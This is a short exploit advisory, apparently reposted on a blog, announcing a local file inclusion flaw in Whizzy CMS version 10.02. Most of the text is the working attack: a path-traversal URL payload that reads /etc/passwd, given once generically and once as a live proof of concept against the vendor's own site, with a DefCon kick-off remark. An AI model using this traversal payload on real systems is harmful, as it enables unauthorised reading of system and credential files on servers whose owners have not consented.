~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.02
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
PoC on live demo:
http://www.unverse.net/?../../../../../../../../../../../../etc/passwd
This is a special DefCon 18 kick off from me! See ya there ;)
Special Tnx : lun0s, proge, sToRm, progenic, gny
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment